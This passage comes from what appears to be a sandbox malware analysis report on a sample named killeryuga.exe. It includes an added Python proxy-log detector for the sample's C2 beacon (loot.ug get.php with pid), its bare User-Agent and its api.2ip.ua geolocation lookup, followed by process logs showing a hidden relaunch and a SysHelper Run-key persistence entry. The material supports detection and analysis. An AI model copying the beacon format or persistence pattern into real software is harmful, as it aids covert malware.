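The two sessions above give a network defender three usable signals: a plain-HTTP GET to a long random-looking path ending in /get.php with a 32-hex-character pid value (the victim identifier, so the shape, not the value, is what to match), the literal User-Agent string "Microsoft Internet Explorer" passed to InternetOpen (a real IE build sends a "Mozilla/..." string, so this bare value is itself an anomaly), and a TLS fetch of https://api.2ip.ua/geo.json, a public geolocation service the sample queries for its own profiling. The script below is an added example for this page, not VMRay's code and not the sample's; it tags lines of a constructed, tab-separated proxy log against those indicators plus the two contacted IPs from the summary, then issues a per-client verdict. The log layout and the sample lines are constructed; the report does not say which of the two IPs served which host, so that assignment in the sample is arbitrary.

```python
"""Proxy-log detection for the HTTP exchanges recorded in this report.

Added example; neither VMRay's code nor code from the analysed sample.
"""
import re
from collections import defaultdict
from urllib.parse import parse_qs, urlsplit

# Indicators copied from the report above.
C2_HOST = "loot.ug"
CONTACTED_IPS = {"77.123.139.189", "95.213.139.118"}
GEO_HOST, GEO_PATH = "api.2ip.ua", "/geo.json"
BARE_UA = "Microsoft Internet Explorer"        # exact string passed to InternetOpen
PID_RE = re.compile(r"^[0-9A-Fa-f]{32}$")       # shape of the pid= value in the beacon URL


def parse_line(line):
    """Constructed layout: ts<TAB>client_ip<TAB>dst_ip<TAB>method<TAB>url<TAB>user_agent."""
    ts, client, dst, method, url, ua = line.rstrip("\n").split("\t")
    return {"ts": ts, "client": client, "dst": dst, "method": method, "url": url, "ua": ua}


def classify(rec):
    """Return the indicator tags one request matches, strongest first."""
    u = urlsplit(rec["url"])
    pid = parse_qs(u.query).get("pid", [""])[0]
    tags = []
    if rec["method"] == "GET" and u.path.endswith("/get.php") and PID_RE.match(pid):
        tags.append("beacon_getphp_pid")
    if u.hostname == C2_HOST:
        tags.append("known_c2_host")
    if rec["dst"] in CONTACTED_IPS:
        tags.append("known_c2_ip")
    if u.hostname == GEO_HOST and u.path == GEO_PATH:
        tags.append("geoip_lookup_2ip")
    if rec["ua"] == BARE_UA:
        tags.append("bare_ie_user_agent")
    return tags


def scan(lines):
    """Tag each line; a client is 'high' on a known C2 hit or beacon+geo lookup, else 'review'."""
    tagged, per_client = [], defaultdict(set)
    for n, line in enumerate(lines, 1):
        if not line.strip():
            continue
        rec = parse_line(line)
        tags = classify(rec)
        if tags:
            tagged.append((n, rec["client"], tags))
            per_client[rec["client"]].update(tags)
    verdicts = {}
    for client, t in per_client.items():
        strong = bool(t & {"known_c2_host", "known_c2_ip"}) or \
            {"beacon_getphp_pid", "geoip_lookup_2ip"} <= t
        verdicts[client] = "high" if strong else "review"
    return tagged, verdicts


# Constructed sample log (which contacted IP served which host is not stated in the report).
SAMPLE_LOG = "\n".join("\t".join(r) for r in [
    ("2019-03-24T05:38:48Z", "10.0.0.21", "77.123.139.189", "GET",
     "http://loot.ug/Asjhd4736578gUdhfsfy4983689q34hHSDfig56usdfloadold/get.php"
     "?pid=AE2BD2A0D8075FA76A58D68C2A4634E3", BARE_UA),
    ("2019-03-24T05:38:51Z", "10.0.0.21", "95.213.139.118", "GET",
     "https://api.2ip.ua/geo.json", BARE_UA),
    ("2019-03-24T05:39:02Z", "10.0.0.33", "192.0.2.10", "GET", "https://www.microsoft.com/",
     "Mozilla/5.0 (Windows NT 6.1; Trident/7.0; rv:11.0) like Gecko"),
    ("2019-03-24T05:39:10Z", "10.0.0.33", "192.0.2.11", "GET",
     "http://shop.example/get.php?pid=1234",
     "Mozilla/5.0 (Windows NT 6.1; Trident/7.0; rv:11.0) like Gecko"),
    ("2019-03-24T05:40:00Z", "10.0.0.40", "192.0.2.12", "GET", "http://www.example.net/", BARE_UA),
])

if __name__ == "__main__":
    hits, verdicts = scan(SAMPLE_LOG.splitlines())
    for n, client, tags in hits:
        print(f"line {n} {client}: {', '.join(tags)}")
    print(verdicts)
```

The bare User-Agent and the 2ip.ua lookup are deliberately only "review" on their own: any program can set that UA string, and api.2ip.ua is a legitimate service that other software queries too. The host and IP indicators age quickly, so the durable rule is the combination of a get.php beacon carrying a 32-hex pid and a geolocation lookup from the same client within a short window.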
Process #18: killeryuga.exe
1671 2
»
Information Value
ID #18
File Name c:\users\5p5nrgjn0js halpmcxz\appdata\local\ef299c90-595a-4e2e-bacc-9f2c91e89b2a\killeryuga.exe
Command Line "C:\Users\5p5NrGJn0jS HALPmcxz\AppData\Local\ef299c90-595a-4e2e-bacc-9f2c91e89b2a\killeryuga.exe" --ForNetRes "xNymGbbmgdkaiGhxWYZyeVFnQDvBkBPf0IgumxuC" BUD0QXFD5xSxqVR1j3D3kK2hZG9mBRMc93aQdsvt IsAutoStart IsNotTask
Initial Working Directory C:\Windows\system32\
Monitor Start Time: 00:03:10, Reason: Child Process
Unmonitor End Time: 00:03:41, Reason: Self Terminated
Monitor Duration 00:00:30
OS Process Information
Information Value
PID 0x588
Parent PID 0x780 (c:\users\5p5nrgjn0js halpmcxz\appdata\local\ef299c90-595a-4e2e-bacc-9f2c91e89b2a\killeryuga.exe)
Bitness 32-bit
Is Created or Modified Executable True
Integrity Level Medium
Username XDUWTFONO\5p5NrGJn0jS HALPmcxz
Enabled Privileges SeChangeNotifyPrivilege
Thread IDs 0x554, 0x380, 0x300, 0x348, 0x140, 0x268, 0x30C, 0x308, 0x7A8, 0x7AC
Memory Dumps
Name Start VA End VA Dump Reason PE Rebuilds Bitness Entry Points YARA Actions
killeryuga.exe 0x00400000 0x007CCFFF Content Changed - 32-bit 0x004068AB False
killeryuga.exe 0x00400000 0x007CCFFF Content Changed - 32-bit 0x0041551E False
killeryuga.exe 0x00400000 0x007CCFFF Content Changed - 32-bit 0x00404045 False
killeryuga.exe 0x00400000 0x007CCFFF Content Changed - 32-bit 0x00414D7D False
killeryuga.exe 0x00400000 0x007CCFFF Content Changed - 32-bit 0x00408F6D False
killeryuga.exe 0x00400000 0x007CCFFF Content Changed - 32-bit 0x0040E452 False
killeryuga.exe 0x00400000 0x007CCFFF Content Changed - 32-bit 0x0041D8B9, 0x0040BC4A False
killeryuga.exe 0x00400000 0x007CCFFF Content Changed - 32-bit 0x0040AA58 False
killeryuga.exe 0x00400000 0x007CCFFF Content Changed - 32-bit 0x00405A42 False
killeryuga.exe 0x00400000 0x007CCFFF Content Changed - 32-bit 0x0040943F False
killeryuga.exe 0x00400000 0x007CCFFF Content Changed - 32-bit 0x00424067, 0x0041F26F, ... False
killeryuga.exe 0x00400000 0x007CCFFF Content Changed - 32-bit 0x00418238, 0x0040F68F False
killeryuga.exe 0x00400000 0x007CCFFF Content Changed - 32-bit 0x00402D3E, 0x00417990 False
killeryuga.exe 0x00400000 0x007CCFFF Content Changed - 32-bit 0x00401DB0 False
buffer 0x009543E8 0x0098374E Marked Executable - 32-bit - False
killeryuga.exe 0x00400000 0x007CCFFF Content Changed - 32-bit 0x00423043 False
killeryuga.exe 0x00400000 0x007CCFFF Content Changed - 32-bit 0x0041C317 False
killeryuga.exe 0x00400000 0x007CCFFF Content Changed - 32-bit 0x0041B267 False
killeryuga.exe 0x00400000 0x007CCFFF Content Changed - 32-bit 0x0041E4C3 False
killeryuga.exe 0x00400000 0x007CCFFF Content Changed - 32-bit 0x0042CE51 False
killeryuga.exe 0x00400000 0x007CCFFF Content Changed - 32-bit 0x0042D244 False
killeryuga.exe 0x00400000 0x007CCFFF Content Changed - 32-bit 0x004281E0 False
killeryuga.exe 0x00400000 0x007CCFFF Content Changed - 32-bit 0x00422D24 False
killeryuga.exe 0x00400000 0x007CCFFF Content Changed - 32-bit 0x004207EE False
killeryuga.exe 0x00400000 0x007CCFFF Content Changed - 32-bit 0x0043D44C, 0x00439A27, ... False
killeryuga.exe 0x00400000 0x007CCFFF Content Changed - 32-bit 0x00429D19, 0x00438910, ... False
killeryuga.exe 0x00400000 0x007CCFFF Content Changed - 32-bit 0x004400B4 False
killeryuga.exe 0x00400000 0x007CCFFF Content Changed - 32-bit 0x00411BE0 False
killeryuga.exe 0x00400000 0x007CCFFF Content Changed - 32-bit 0x00412360 False
killeryuga.exe 0x00400000 0x007CCFFF Content Changed - 32-bit 0x0040D690, 0x004103C0 False
killeryuga.exe 0x00400000 0x007CCFFF Content Changed - 32-bit 0x00421FDE False
killeryuga.exe 0x00400000 0x007CCFFF Content Changed - 32-bit 0x0041A448 False
killeryuga.exe 0x00400000 0x007CCFFF Content Changed - 32-bit 0x00410695 False
killeryuga.exe 0x00400000 0x007CCFFF Content Changed - 32-bit 0x004425A0 False
killeryuga.exe 0x00400000 0x007CCFFF Content Changed - 32-bit 0x0043BFE0 False
killeryuga.exe 0x00400000 0x007CCFFF Process Termination - 32-bit - False
Host Behavior
File (6)
Operation Filename Additional Information Success Count
Open STD_INPUT_HANDLE - True 2
Open STD_OUTPUT_HANDLE - True 2
Open STD_ERROR_HANDLE - True 2
Registry (2)
Operation Key Additional Information Success Count
Open Key HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run - True 1
Read Value HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run value_name = SysHelper, data = "C:\Users\5p5NrGJn0jS HALPmcxz\AppData\Local\ef299c90-595a-4e2e-bacc-9f2c91e89b2a\killeryuga.exe" --AutoStart, type = REG_EXPAND_SZ True 1
Process (460)
Operation Process Additional Information Success Count
Create C:\Users\5p5NrGJn0jS HALPmcxz\AppData\Local\ef299c90-595a-4e2e-bacc-9f2c91e89b2a\killeryuga.exe os_pid = 0x7a0, creation_flags = CREATE_DETACHED_PROCESS, CREATE_IDLE_PRIORITY_CLASS, startup_flags = STARTF_USESHOWWINDOW, show_window = SW_HIDE True 1
Enumerate Processes - - True 1
Open System desired_access = PROCESS_VM_READ, PROCESS_QUERY_INFORMATION False 1
Open c:\windows\system32\smss.exe desired_access = PROCESS_VM_READ, PROCESS_QUERY_INFORMATION False 1
Open c:\windows\system32\csrss.exe desired_access = PROCESS_VM_READ, PROCESS_QUERY_INFORMATION False 1
Open c:\windows\system32\wininit.exe desired_access = PROCESS_VM_READ, PROCESS_QUERY_INFORMATION False 1
Open c:\windows\system32\csrss.exe desired_access = PROCESS_VM_READ, PROCESS_QUERY_INFORMATION False 1
Open c:\windows\system32\winlogon.exe desired_access = PROCESS_VM_READ, PROCESS_QUERY_INFORMATION False 1
Open c:\windows\system32\lsm.exe desired_access = PROCESS_VM_READ, PROCESS_QUERY_INFORMATION False 1
Open c:\windows\system32\lsass.exe desired_access = PROCESS_VM_READ, PROCESS_QUERY_INFORMATION False 1
Open c:\windows\system32\lsm.exe desired_access = PROCESS_VM_READ, PROCESS_QUERY_INFORMATION False 1
Open c:\windows\system32\svchost.exe desired_access = PROCESS_VM_READ, PROCESS_QUERY_INFORMATION False 1
Open c:\windows\system32\svchost.exe desired_access = PROCESS_VM_READ, PROCESS_QUERY_INFORMATION False 1
Open c:\windows\system32\svchost.exe desired_access = PROCESS_VM_READ, PROCESS_QUERY_INFORMATION False 1
Open c:\windows\system32\conhost.exe desired_access = PROCESS_VM_READ, PROCESS_QUERY_INFORMATION False 1
Open c:\windows\system32\svchost.exe desired_access = PROCESS_VM_READ, PROCESS_QUERY_INFORMATION False 1
Open c:\windows\system32\audiodg.exe desired_access = PROCESS_VM_READ, PROCESS_QUERY_INFORMATION False 1
Open c:\windows\system32\svchost.exe desired_access = PROCESS_VM_READ, PROCESS_QUERY_INFORMATION False 1
Open c:\windows\system32\svchost.exe desired_access = PROCESS_VM_READ, PROCESS_QUERY_INFORMATION False 1
Open c:\windows\system32\spoolsv.exe desired_access = PROCESS_VM_READ, PROCESS_QUERY_INFORMATION False 1
Open c:\windows\system32\svchost.exe desired_access = PROCESS_VM_READ, PROCESS_QUERY_INFORMATION False 1
Open c:\windows\system32\taskhost.exe desired_access = PROCESS_VM_READ, PROCESS_QUERY_INFORMATION True 1
Open c:\windows\system32\sppsvc.exe desired_access = PROCESS_VM_READ, PROCESS_QUERY_INFORMATION False 1
Open c:\windows\system32\userinit.exe desired_access = PROCESS_VM_READ, PROCESS_QUERY_INFORMATION True 1
Open c:\windows\explorer.exe desired_access = PROCESS_VM_READ, PROCESS_QUERY_INFORMATION True 1
Open c:\windows\system32\dwm.exe desired_access = PROCESS_VM_READ, PROCESS_QUERY_INFORMATION True 1
Open c:\program files (x86)\adobe\reader 10.0\reader\reader_sl.exe desired_access = PROCESS_VM_READ, PROCESS_QUERY_INFORMATION True 1
Open c:\program files (x86)\java\magnificent.exe desired_access = PROCESS_VM_READ, PROCESS_QUERY_INFORMATION True 1
Open c:\windows\system32\svchost.exe desired_access = PROCESS_VM_READ, PROCESS_QUERY_INFORMATION False 1
Open c:\users\5p5nrgjn0js halpmcxz\appdata\local\ef299c90-595a-4e2e-bacc-9f2c91e89b2a\killeryuga.exe desired_access = SYNCHRONIZE True 1
Open c:\users\5p5nrgjn0js halpmcxz\appdata\local\ef299c90-595a-4e2e-bacc-9f2c91e89b2a\killeryuga.exe desired_access = SYNCHRONIZE True 5
Open c:\users\5p5nrgjn0js halpmcxz\appdata\local\ef299c90-595a-4e2e-bacc-9f2c91e89b2a\killeryuga.exe desired_access = SYNCHRONIZE True 4
Open c:\users\5p5nrgjn0js halpmcxz\appdata\local\ef299c90-595a-4e2e-bacc-9f2c91e89b2a\killeryuga.exe desired_access = SYNCHRONIZE True 33
Open c:\users\5p5nrgjn0js halpmcxz\appdata\local\ef299c90-595a-4e2e-bacc-9f2c91e89b2a\killeryuga.exe desired_access = SYNCHRONIZE True 1
Open c:\users\5p5nrgjn0js halpmcxz\appdata\local\ef299c90-595a-4e2e-bacc-9f2c91e89b2a\killeryuga.exe desired_access = SYNCHRONIZE True 4
Open c:\users\5p5nrgjn0js halpmcxz\appdata\local\ef299c90-595a-4e2e-bacc-9f2c91e89b2a\killeryuga.exe desired_access = SYNCHRONIZE True 383
Module (466)
Operation Module Additional Information Success Count
Load KERNEL32.DLL base_address = 0x75350000 True 1
Load ADVAPI32.dll base_address = 0x76f50000 True 2
Load GDI32.dll base_address = 0x76a80000 True 1
Load ole32.dll base_address = 0x75bd0000 True 2
Load SHELL32.dll base_address = 0x75e30000 True 2
Load USER32.dll base_address = 0x75470000 True 2
Load kernel32.dll base_address = 0x75350000 True 2
Load RPCRT4.dll base_address = 0x759b0000 True 1
Load MPR.dll base_address = 0x750d0000 True 1
Load WININET.dll base_address = 0x75d30000 True 1
Load WINMM.dll base_address = 0x75090000 True 1
Load SHLWAPI.dll base_address = 0x77020000 True 1
Load KERNEL32.dll base_address = 0x75350000 True 1
Load OLEAUT32.dll base_address = 0x76b50000 True 1
Load IPHLPAPI.DLL base_address = 0x750f0000 True 1
Load WS2_32.dll base_address = 0x76b10000 True 1
Load DNSAPI.dll base_address = 0x75020000 True 1
Load CRYPT32.dll base_address = 0x751a0000 True 1
Load msvcr100.dll base_address = 0x74e80000 True 1
Load Psapi.dll base_address = 0x75460000 True 1
Get Handle c:\windows\syswow64\kernel32.dll base_address = 0x75350000 True 15
Get Handle mscoree.dll - False 1
Get Filename - process_name = c:\users\5p5nrgjn0js halpmcxz\appdata\local\ef299c90-595a-4e2e-bacc-9f2c91e89b2a\killeryuga.exe, file_name_orig = C:\Users\5p5NrGJn0jS HALPmcxz\AppData\Local\ef299c90-595a-4e2e-bacc-9f2c91e89b2a\killeryuga.exe, size = 260 True 2
Get Filename - process_name = c:\users\5p5nrgjn0js halpmcxz\appdata\local\ef299c90-595a-4e2e-bacc-9f2c91e89b2a\killeryuga.exe, file_name_orig = C:\Users\5p5NrGJn0jS HALPmcxz\AppData\Local\ef299c90-595a-4e2e-bacc-9f2c91e89b2a\killeryuga.exe, size = 1024 True 1
Get Address c:\windows\syswow64\kernel32.dll function = CompareStringA, address_out = 0x75363c5a True 1
Get Address c:\windows\syswow64\kernel32.dll function = GetTimeZoneInformation, address_out = 0x7536465a True 2
Get Address c:\windows\syswow64\kernel32.dll function = FlushFileBuffers, address_out = 0x7536469b True 2
Get Address c:\windows\syswow64\kernel32.dll function = CloseHandle, address_out = 0x75361410 True 2
Get Address c:\windows\syswow64\kernel32.dll function = CreateFileA, address_out = 0x753653c6 True 2
Get Address c:\windows\syswow64\kernel32.dll function = GetLocaleInfoW, address_out = 0x75363c42 True 2
Get Address c:\windows\syswow64\kernel32.dll function = CompareStringW, address_out = 0x75363bca True 2
Get Address c:\windows\syswow64\kernel32.dll function = EnumSystemLocalesA, address_out = 0x7538287b True 1
Get Address c:\windows\syswow64\kernel32.dll function = GetLocaleInfoA, address_out = 0x7537d5e5 True 1
Get Address c:\windows\syswow64\kernel32.dll function = GetUserDefaultLCID, address_out = 0x75363da5 True 2
Get Address c:\windows\syswow64\kernel32.dll function = GetDateFormatA, address_out = 0x7538a959 True 1
Get Address c:\windows\syswow64\kernel32.dll function = GetTimeFormatA, address_out = 0x7538a842 True 1
Get Address c:\windows\syswow64\kernel32.dll function = GetStringTypeW, address_out = 0x75361946 True 2
Get Address c:\windows\syswow64\kernel32.dll function = GetStringTypeA, address_out = 0x75388266 True 1
Get Address c:\windows\syswow64\kernel32.dll function = WriteFileEx, address_out = 0x753e45ef True 1
Get Address c:\windows\syswow64\kernel32.dll function = FatalAppExitA, address_out = 0x753e4691 True 2
Get Address c:\windows\syswow64\kernel32.dll function = FillConsoleOutputAttribute, address_out = 0x754071e9 True 1
Get Address c:\windows\syswow64\kernel32.dll function = GetModuleHandleA, address_out = 0x75361245 True 1
Get Address c:\windows\syswow64\kernel32.dll function = SetCommMask, address_out = 0x753e7198 True 1
Get Address c:\windows\syswow64\kernel32.dll function = TransmitCommChar, address_out = 0x753e75fe True 1
Get Address c:\windows\syswow64\kernel32.dll function = PrepareTape, address_out = 0x753ed232 True 1
Get Address c:\windows\syswow64\kernel32.dll function = GetProcAddress, address_out = 0x75361222 True 2
Get Address c:\windows\syswow64\kernel32.dll function = lstrlenW, address_out = 0x75361700 True 2
Get Address c:\windows\syswow64\kernel32.dll function = GetVolumePathNameA, address_out = 0x753ebeed True 1
Get Address c:\windows\syswow64\kernel32.dll function = IsBadWritePtr, address_out = 0x7538d1ec True 1
Get Address c:\windows\syswow64\kernel32.dll function = FindNextVolumeMountPointA, address_out = 0x753ec189 True 1
Get Address c:\windows\syswow64\kernel32.dll function = GlobalAlloc, address_out = 0x7536588e True 2
Get Address c:\windows\syswow64\kernel32.dll function = UnlockFileEx, address_out = 0x7538d594 True 1
Get Address c:\windows\syswow64\kernel32.dll function = GetModuleHandleW, address_out = 0x753634b0 True 2
Get Address c:\windows\syswow64\kernel32.dll function = CreateDirectoryExA, address_out = 0x753d9479 True 1
Get Address c:\windows\syswow64\kernel32.dll function = InterlockedDecrement, address_out = 0x753613f0 True 1
Get Address c:\windows\syswow64\kernel32.dll function = WriteTapemark, address_out = 0x753ed2d2 True 1
Get Address c:\windows\syswow64\kernel32.dll function = GetDriveTypeW, address_out = 0x7536418b True 1
Get Address c:\windows\syswow64\kernel32.dll function = GetNativeSystemInfo, address_out = 0x753710b5 True 1
Get Address c:\windows\syswow64\kernel32.dll function = IsValidLocale, address_out = 0x7537ce46 True 2
Get Address c:\windows\syswow64\kernel32.dll function = GlobalDeleteAtom, address_out = 0x7537cdad True 1
Get Address c:\windows\syswow64\kernel32.dll function = LCMapStringW, address_out = 0x753617b9 True 2
Get Address c:\windows\syswow64\kernel32.dll function = LCMapStringA, address_out = 0x7538bc39 True 1
Get Address c:\windows\syswow64\kernel32.dll function = MultiByteToWideChar, address_out = 0x7536192e True 2
Get Address c:\windows\syswow64\kernel32.dll function = WriteConsoleW, address_out = 0x75387aca True 2
Get Address c:\windows\syswow64\kernel32.dll function = GetConsoleOutputCP, address_out = 0x75379b0f True 1
Get Address c:\windows\syswow64\kernel32.dll function = WriteConsoleA, address_out = 0x753612fc True 1
Get Address c:\windows\syswow64\kernel32.dll function = SetStdHandle, address_out = 0x753e454f True 2
Get Address c:\windows\syswow64\kernel32.dll function = InitializeCriticalSectionAndSpinCount, address_out = 0x75361916 True 2
Get Address c:\windows\syswow64\kernel32.dll function = LoadLibraryA, address_out = 0x753649d7 True 2
Get Address c:\windows\syswow64\kernel32.dll function = InterlockedExchange, address_out = 0x75361462 True 1
Get Address c:\windows\syswow64\kernel32.dll function = FreeLibrary, address_out = 0x753634c8 True 2
Get Address c:\windows\syswow64\kernel32.dll function = SetConsoleCtrlHandler, address_out = 0x75368a09 True 2
Get Address c:\windows\syswow64\kernel32.dll function = GetStartupInfoW, address_out = 0x75364d40 True 2
Get Address c:\windows\syswow64\kernel32.dll function = RaiseException, address_out = 0x753658a6 True 2
Get Address c:\windows\syswow64\kernel32.dll function = RtlUnwind, address_out = 0x7538d1c3 True 2
Get Address c:\windows\syswow64\kernel32.dll function = TerminateProcess, address_out = 0x7537d802 True 3
Get Address c:\windows\syswow64\kernel32.dll function = GetCurrentProcess, address_out = 0x75361809 True 2
Get Address c:\windows\syswow64\kernel32.dll function = UnhandledExceptionFilter, address_out = 0x7538772f True 2
Get Address c:\windows\syswow64\kernel32.dll function = SetUnhandledExceptionFilter, address_out = 0x753687c9 True 2
Get Address c:\windows\syswow64\kernel32.dll function = IsDebuggerPresent, address_out = 0x75364a5d True 2
Get Address c:\windows\syswow64\kernel32.dll function = HeapAlloc, address_out = 0x775fe026 True 2
Get Address c:\windows\syswow64\kernel32.dll function = GetLastError, address_out = 0x753611c0 True 2
Get Address c:\windows\syswow64\kernel32.dll function = HeapFree, address_out = 0x753614c9 True 2
Get Address c:\windows\syswow64\kernel32.dll function = Sleep, address_out = 0x753610ff True 2
Get Address c:\windows\syswow64\kernel32.dll function = ExitProcess, address_out = 0x75367a10 True 3
Get Address c:\windows\syswow64\kernel32.dll function = WriteFile, address_out = 0x75361282 True 2
Get Address c:\windows\syswow64\kernel32.dll function = GetStdHandle, address_out = 0x753651b3 True 2
Get Address c:\windows\syswow64\kernel32.dll function = GetModuleFileNameA, address_out = 0x753614b1 True 2
Get Address c:\windows\syswow64\kernel32.dll function = GetModuleFileNameW, address_out = 0x75364950 True 2
Get Address c:\windows\syswow64\kernel32.dll function = FreeEnvironmentStringsW, address_out = 0x753651cb True 2
Get Address c:\windows\syswow64\kernel32.dll function = GetEnvironmentStringsW, address_out = 0x753651e3 True 2
Get Address c:\windows\syswow64\kernel32.dll function = GetCommandLineW, address_out = 0x75365223 True 2
Get Address c:\windows\syswow64\kernel32.dll function = SetHandleCount, address_out = 0x7536cb29 True 1
Get Address c:\windows\syswow64\kernel32.dll function = GetFileType, address_out = 0x75363531 True 2
Get Address c:\windows\syswow64\kernel32.dll function = GetStartupInfoA, address_out = 0x75360e00 True 1
Get Address c:\windows\syswow64\kernel32.dll function = DeleteCriticalSection, address_out = 0x776045f5 True 2
Get Address c:\windows\syswow64\kernel32.dll function = TlsGetValue, address_out = 0x753611e0 True 2
Get Address c:\windows\syswow64\kernel32.dll function = TlsAlloc, address_out = 0x753649ad True 2
Get Address c:\windows\syswow64\kernel32.dll function = TlsSetValue, address_out = 0x753614fb True 2
Get Address c:\windows\syswow64\kernel32.dll function = TlsFree, address_out = 0x75363587 True 2
Get Address c:\windows\syswow64\kernel32.dll function = InterlockedIncrement, address_out = 0x75361400 True 1
Get Address c:\windows\syswow64\kernel32.dll function = SetLastError, address_out = 0x753611a9 True 2
Get Address c:\windows\syswow64\kernel32.dll function = GetCurrentThreadId, address_out = 0x75361450 True 2
Get Address c:\windows\syswow64\kernel32.dll function = GetCurrentThread, address_out = 0x753617ec True 2
Get Address c:\windows\syswow64\kernel32.dll function = HeapCreate, address_out = 0x75364a2d True 1
Get Address c:\windows\syswow64\kernel32.dll function = HeapDestroy, address_out = 0x753635b7 True 1
Get Address c:\windows\syswow64\kernel32.dll function = VirtualFree, address_out = 0x7536186e True 3
Get Address c:\windows\syswow64\kernel32.dll function = QueryPerformanceCounter, address_out = 0x75361725 True 2
Get Address c:\windows\syswow64\kernel32.dll function = GetTickCount, address_out = 0x7536110c True 2
Get Address c:\windows\syswow64\kernel32.dll function = GetCurrentProcessId, address_out = 0x753611f8 True 2
Get Address c:\windows\syswow64\kernel32.dll function = GetSystemTimeAsFileTime, address_out = 0x75363509 True 2
Get Address c:\windows\syswow64\kernel32.dll function = SetFilePointer, address_out = 0x753617d1 True 2
Get Address c:\windows\syswow64\kernel32.dll function = WideCharToMultiByte, address_out = 0x7536170d True 2
Get Address c:\windows\syswow64\kernel32.dll function = GetConsoleCP, address_out = 0x75407bff True 2
Get Address c:\windows\syswow64\kernel32.dll function = GetConsoleMode, address_out = 0x75361328 True 2
Get Address c:\windows\syswow64\kernel32.dll function = EnterCriticalSection, address_out = 0x775f22b0 True 2
Get Address c:\windows\syswow64\kernel32.dll function = LeaveCriticalSection, address_out = 0x775f2270 True 2
Get Address c:\windows\syswow64\kernel32.dll function = GetCPInfo, address_out = 0x75365189 True 2
Get Address c:\windows\syswow64\kernel32.dll function = GetACP, address_out = 0x7536179c True 2
Get Address c:\windows\syswow64\kernel32.dll function = GetOEMCP, address_out = 0x7538d1a1 True 2
Get Address c:\windows\syswow64\kernel32.dll function = IsValidCodePage, address_out = 0x75364493 True 2
Get Address c:\windows\syswow64\kernel32.dll function = VirtualAlloc, address_out = 0x75361856 True 3
Get Address c:\windows\syswow64\kernel32.dll function = HeapReAlloc, address_out = 0x77611f6e True 2
Get Address c:\windows\syswow64\kernel32.dll function = HeapSize, address_out = 0x77603002 True 2
Get Address c:\windows\syswow64\kernel32.dll function = SetEnvironmentVariableA, address_out = 0x7536e331 True 2
Get Address c:\windows\syswow64\advapi32.dll function = IsValidSecurityDescriptor, address_out = 0x76f5b58c True 1
Get Address c:\windows\syswow64\advapi32.dll function = GetFileSecurityA, address_out = 0x76f919b8 True 1
Get Address c:\windows\syswow64\advapi32.dll function = ImpersonateLoggedOnUser, address_out = 0x76f5c57a True 1
Get Address c:\windows\syswow64\advapi32.dll function = ObjectCloseAuditAlarmW, address_out = 0x76f93389 True 1
Get Address c:\windows\syswow64\advapi32.dll function = CreatePrivateObjectSecurity, address_out = 0x76f79a12 True 1
Get Address c:\windows\syswow64\advapi32.dll function = AreAllAccessesGranted, address_out = 0x76f930a8 True 1
Get Address c:\windows\syswow64\advapi32.dll function = GetAclInformation, address_out = 0x76f5cc89 True 1
Get Address c:\windows\syswow64\advapi32.dll function = AreAnyAccessesGranted, address_out = 0x76f930b8 True 1
Get Address c:\windows\syswow64\gdi32.dll function = SetMetaFileBitsEx, address_out = 0x76aa7121 True 1
Get Address c:\windows\syswow64\gdi32.dll function = CreateDIBPatternBrushPt, address_out = 0x76aab6da True 1
Get Address c:\windows\syswow64\gdi32.dll function = SetWindowExtEx, address_out = 0x76aa1ace True 1
Get Address c:\windows\syswow64\gdi32.dll function = GetMetaFileBitsEx, address_out = 0x76aa6e71 True 1
Get Address c:\windows\syswow64\gdi32.dll function = GetDeviceCaps, address_out = 0x76a94de0 True 1
Get Address c:\windows\syswow64\gdi32.dll function = AngleArc, address_out = 0x76ac4124 True 1
Get Address c:\windows\syswow64\gdi32.dll function = GetDCBrushColor, address_out = 0x76ac232e True 1
Get Address c:\windows\syswow64\gdi32.dll function = FlattenPath, address_out = 0x76ac555d True 1
Get Address c:\windows\syswow64\gdi32.dll function = GetGraphicsMode, address_out = 0x76aa138a True 1
Get Address c:\windows\syswow64\gdi32.dll function = SetDIBits, address_out = 0x76a97590 True 1
Get Address c:\windows\syswow64\gdi32.dll function = CopyEnhMetaFileW, address_out = 0x76acd9dc True 1
Get Address c:\windows\syswow64\gdi32.dll function = Chord, address_out = 0x76ac439f True 1
Get Address c:\windows\syswow64\gdi32.dll function = PlayMetaFile, address_out = 0x76aab2b9 True 1
Get Address c:\windows\syswow64\ole32.dll function = CLSIDFromProgID, address_out = 0x75bf503c True 1
Get Address c:\windows\syswow64\ole32.dll function = OleUninitialize, address_out = 0x75beeba1 True 1
Get Address c:\windows\syswow64\ole32.dll function = OleSetMenuDescriptor, address_out = 0x75c2dc53 True 1
Get Address c:\windows\syswow64\ole32.dll function = OleLoadFromStream, address_out = 0x75bd6143 True 1
Get Address c:\windows\syswow64\ole32.dll function = OleQueryCreateFromData, address_out = 0x75c532d4 True 1
Get Address c:\windows\syswow64\shell32.dll function = SHGetPathFromIDListA, address_out = 0x75f51c24 True 1
Get Address c:\windows\syswow64\shell32.dll function = ShellExecuteW, address_out = 0x75e43c71 True 1
Get Address c:\windows\syswow64\shell32.dll function = SHGetInstanceExplorer, address_out = 0x75e76399 True 1
Get Address c:\windows\syswow64\shell32.dll function = Shell_NotifyIconA, address_out = 0x76078af2 True 1
Get Address c:\windows\syswow64\shell32.dll function = DragAcceptFiles, address_out = 0x75f51bf1 True 1
Get Address c:\windows\syswow64\user32.dll function = SetWindowsHookW, address_out = 0x754c8ca2 True 1
Get Address c:\windows\syswow64\user32.dll function = PostThreadMessageW, address_out = 0x75488bff True 2
Get Address c:\windows\syswow64\user32.dll function = SetMessageQueue, address_out = 0x7549c8e7 True 1
Get Address c:\windows\syswow64\user32.dll function = GetSysColor, address_out = 0x75486c3c True 1
Get Address c:\windows\syswow64\user32.dll function = BroadcastSystemMessageW, address_out = 0x754cc140 True 1
Get Address c:\windows\syswow64\user32.dll function = EndPaint, address_out = 0x75491341 True 2
Get Address c:\windows\syswow64\user32.dll function = OpenDesktopA, address_out = 0x7549011a True 1
Get Address c:\windows\syswow64\user32.dll function = SetCapture, address_out = 0x754aed56 True 1
Get Address c:\windows\syswow64\user32.dll function = MsgWaitForMultipleObjects, address_out = 0x75490b4a True 1
Get Address c:\windows\syswow64\user32.dll function = DefDlgProcW, address_out = 0x77634100 True 1
Get Address c:\windows\syswow64\user32.dll function = DdeUnaccessData, address_out = 0x754d82f4 True 1
Get Address c:\windows\syswow64\user32.dll function = GetClassInfoExW, address_out = 0x7548b238 True 1
